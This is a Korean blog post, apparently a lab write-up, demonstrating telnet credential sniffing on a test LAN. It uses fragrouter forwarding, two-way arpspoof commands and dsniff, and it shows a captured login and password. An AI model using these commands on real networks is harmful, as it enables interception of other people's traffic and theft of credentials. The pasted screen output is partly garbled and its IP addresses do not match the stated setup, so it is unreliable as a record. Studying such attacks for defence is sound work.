2020. 7. 9.

[Network] dsniff를 이용한 telnet 스니핑



    1. 구성과 계획
    • 네트워크 구성도
    공격자 att6 - 192.168.10.149(00:0C:29:4F:41:6E) /gw 192.168.10.1 (70:5d:cc:04:be:b0)
    텔넷 서버  linux - 192.168.10.143(00:0C:29:7e:55:b9) /gw 192.168.10.1 (70:5d:cc:04:be:b0)
    텔넷 접속자 winXP - 192.168.10.112(00:0C:29:AD:73:0C) /gw 192.168.10.1 (70:5d:cc:04:be:b0)
    텔넷 id/passwd - chan/123

    • 과정 정리
    step1. 포워딩 실행
    step2. ARP 스푸핑 실행
    step3. 스니핑 실행
    step4. 확인

    1. 관련내용정리
    포워딩은 중간에 나에게 패킷을 원래의 목적지로 전달해주는 기능입니다.
    ARP 스푸핑은 상대방의 라우팅 테이블에 있는 네트워크인터페이스 일련번호인 MAC주소를 변경시켜 공격자가 중간에 패킷을 받는 것입니다.
    스니핑은 피해자와 라우터 사이에서 패킷을 훔쳐보는것입니다.

    1. 실습과정
    step1. 프라그라우터 실행
    fragrouter -B1
    피해자 PC winXP 게이트웨이 사이의 패킷을 전달해주는 기능

    step2. ARP 스푸핑 실행
    arpspoof -i eth0 -t 192.168.10.112 192.168.10.143
    xp 라우팅 테이블 안에 telnet server MAC주소를 변경하는 명령어
    arpspoof -i eth0 -t 192.168.10.143 192.168.10.112
    telnet server 라우팅 테이블 안에 xp MAC주소를 변경하는 명령어

    같은 네트워크이기 때문에 게이트웨이로 가지않고 바로 연결한다. 그래서 바로 연결하는 사이의 패킷을 모두 보기위해서는 xp telnet server 모두 arp spoofing 실행한다.
    step3. 스니핑 실행
    dsniff
    att6에서 스니핑 실행하는 명령어이다.
    step4. 확인

    telnet server arp table
    Interface: 192.168 
.10.142 
øx2 
Internet Address 
192.168.10.114 
ØØ-Øc-29-6b-ea-42 
192.168.10.149 
ØØ-Øc-29-6b-ea-42 
192.168.10.151 
Phys icaI 
4c—ed—Fb 
Address 
-95-bd-b? 
r ype 
dynamic 
dynamic 
dynamic
    114 xp mac address 149 att6 mac address 같다는것은 arp spoofing 잘되고 있다는 것을 의미하며 114 xp 통신하는것처럼 보이지만 실제로는 att6으로 패킷이 전달된다.

    Croot@localhost dsniff 
dsniff: listening on ethe 
ø7/ø9/2ø tcp 192.168.1ø.112.114ø 
chan 
exit 
192.168.1ø.143.23 (telnet)
    dsniff 이용해  xp에서 telnet server 로그인할때 입력한 값을 스니핑한 내용입니다.


댓글 없음:

댓글 쓰기